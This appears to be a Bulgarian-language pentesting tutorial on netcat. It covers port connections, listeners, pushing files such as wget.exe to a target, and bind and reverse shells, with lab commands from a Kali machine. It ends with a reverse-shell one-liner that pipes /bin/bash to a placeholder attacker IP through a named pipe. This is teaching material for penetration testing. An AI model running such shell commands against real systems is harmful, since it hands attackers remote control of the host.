Netcat

[h3xu]

Неткат е един от първите инструменти за пентестинг на мрежи и е толкова версатилен и удобен, че всеки един от нас трябва задължително да го разбира и вероятно често използва.

Неткат чете и пише информация във връзки посредством TCP или UDP.

1. Свързване към TCP / UDP

Неткат може да работи както в client така и в server режим.

Можем да използваме инструмента, за да се свържем с всеки порт, който би бил отворен. Например, за да се свържем с даден порт на далечна машина пишем следното:

nc -n -v 192.168.0.200 110

nc е псевдонима на неткат.

аргументите:

-n позволява да пропуснем DNS резолюцията

-v позволява да направим комуникацията вербозна, сиреч да излизат символите на терминала

След това следва дестинацията, а именно IP-то на далечната машина и последно е порта, с който искаме да усъществим контакт (порт 110).

kali@kali$ nc -n -v 192.168.0.200 110
(UNKNOWN) [192.168.0.200] 110 (pop3) open
+OK <666937.8205@localhost>, POP3 server ready

От output-а разбираме, че връзката е усъществена успешно и порта е отворен. След това разбираме, че сървъра работи и е принтирал сървърно 'welcome' съобщение и ни дава логин промпт, което е стандартно в случая.

За да се автентикираме:

kali@kali$ nc -n -v 192.168.0.200 110
(UNKNOWN) [192.168.0.200] 110 (pop3) open
+OK <666937.8205@localhost>, POP3 server ready
USER test
+OK test is known here.
PASS test
-ERR Username or password is invalid or incorrect.
quit
+OK localhost server closing down.

Не успяхме да се автентикираме, но успяхме да комуникираме с дадения сървис на порт 110 посредством неткат.

2. Слушане за връзки

Както вече беше споменато, неткат може да работи и в режим на сървър и в режим на клиент.

За да използваме неткат, като метод на прихващане на обратни връзки:

kali@kali$ nc -nvlp 1234
listening on [any] 1234

От горната команда разбираме следното:

Неткат, не прави днс резолюция, използвай вербозен аутпут, слушай на порт 1234.

Netcat -n (no DNS resolution) -v (verbose mode) -l (listen) -p (port) 1234

След като сме сетъпнали слушащ за обратна връзка порт, единственото нещо, което трябва да направим е да използваме неткат, за да се свържем с дадения порт:

kali@kali$ nc -nv 192.168.0.191 1234
(UNKNOWN) [192.168.0.191] 1234 (?) open

И какво сега? Ами в най-простия вариант можем да изпратим информация например:

kali@kali$ nc -nv 192.168.0.191 1234
(UNKNOWN) [192.168.0.191] 1234 (?) open
here is base64 encoded code to copy and paste onto the target machine

Това, което сме написали съответно ще се трансферира на сървъра от клиента. По този начин можем да извличаме или качваме информация от и към сървъра/клиента. Като това е двупосочна комуникация (клиент <-> сървър).

3. Трансфериране на файлове

Неткат може да бъде използван, за да се трансферират файлове, както в текстов вариант, така и в бинарен.

Сървъра, който слуша за обратна връзка в случая трябва да записва входящата информация във файл:

C:\instruments\nc.exe -nvlp 1234 > incoming.exe
listening on [any] 1234

В случая използваме оператора 'по-голямо от' (>) , за да прехвърлим входящата информация към файл, който искаме.

На атакуващата машина ще "push"-нем някакъв файл, например 'wget.exe' в посока сървъра на далечния хост:

kali@kali$ nc -nv 192.168.0.200 1234 < /usr/share/windows-resources/binaries/wget.exe
(UNKNOWN) [192.168.0.200] 1234 (?) open

Забележете, че тук използвам оператора по-малко от (<), за да трансферирам всичко във файл wget.exe  към порт 1234 на IP 192.168.0.200.

C:\instruments\nc.exe -nvlp 1234 > incoming.exe
listening on [any] 1234
connect to [192.168.0.200] from (UNKNOWN) [192.168.0.191] 44323

Трябва да изчакаме малко, защото не получаваме статус за това дали файла е качен изцяло.

4. Далечно администриране с неткат

Едно от най-добрите качества на неткат е възможността да се пренасочи дадена команда към някакъв поток или порт.

Аргумента '-е' позволява да се специфицира файлово име, което да се екзекутира след усъществена връзка. Това например ни дава възможността да 'spawn'-нем шел през неткат, като зададем например bash или cmd като файл с аргумента '-е':

4.1 BIND shell - директна връзка

В случая виждаме, че атакуващата страна спалнва шел веднага след свързването с таргета, поради задаването на /bin/bash шел с '-e', когато се създава слушащ сървър. Също така, връзката наследява привилегиите на юзъра, който е създал слушащия сървър.

4.2 Reverse Shell - обратна връзка

Представете си, че таргета се намира във вътрешна мрежа и няма контрол върху рутера и не може да прави редиректи например. В случая таргета прави обратна връзка към атакуващата страна, предоставяйки шел:

 

За домашно ви препоръчвам да разберете какво прави следното и кога можем да го използваме:

kali@kali$ mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe